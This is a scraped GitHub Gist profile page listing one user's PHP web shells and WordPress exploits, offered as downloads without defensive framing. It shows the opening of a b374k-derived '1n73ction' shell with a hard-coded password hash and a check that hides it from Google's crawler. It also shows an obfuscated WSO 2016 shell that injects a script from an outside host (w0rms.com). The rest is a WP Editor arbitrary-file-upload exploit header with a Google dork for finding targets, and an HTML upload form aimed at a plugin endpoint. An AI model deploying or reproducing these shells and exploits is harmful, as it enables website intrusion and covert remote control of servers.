Skip to content

Instantly share code, notes, and snippets.

View ichsanbahri's full-sized avatar

Ichsanbahri ichsanbahri

2 followers · 3 following
  • Indonesia
View GitHub Profile
@ichsanbahri
ichsanbahri / 1n73ction.php
Created October 11, 2016 14:52
1n73ction Shell indir – 1n73ction Shell Download – 1n73ction bypass shell – injection shell
<?php
/* (Web Shell b374k r3c0d3d by x'1n73ct|default pass:" 1n73ction ") */
$auth_pass = "9c80a1eaca699e2fc6b994721f8703bc";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
@ichsanbahri
ichsanbahri / wp-editor-exploit.php
Created October 9, 2016 07:15
#########################################################
# Exploit Title: Wordpress WP Editor Authenticated Arbitrary File Upload Vulnerability
# Category: webapps
# Software Link: https://wordpress.org/plugins/wp-editor/
# version affected : 1.2.5.x
# Google Dork : inurl:/wp-content/plugins/wp-editor/
########################################################
-------------------------------------------------------------------------------
@ichsanbahri
ichsanbahri / wso2016.php
Created October 9, 2016 07:27
<?php
$â–› = "63a9f0ea7bb98050796b649e85481845"; //root
$â–˜ = true;
$▜ = 'UTF-8';
$â–š = 'FilesMan';
$â–™ = md5($_SERVER['HTTP_USER_AGENT']);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
prototype(md5($_SERVER['HTTP_HOST'])."key", $â–™);
}
echo "<SCRIPT SRC=http://w0rms.com/sayac.js></SCRIPT>";
@ichsanbahri
ichsanbahri / exploit.php
Created October 9, 2016 07:08
<html>
<body>
<form action="http://[path to WordPress]" method="POST" enctype="multipart/form-data">
<input type="hidden" name="dm_upload" />
<input type="file" name="upfile" />
<input type="submit" value="Submit" />
</form>
</body>
</html>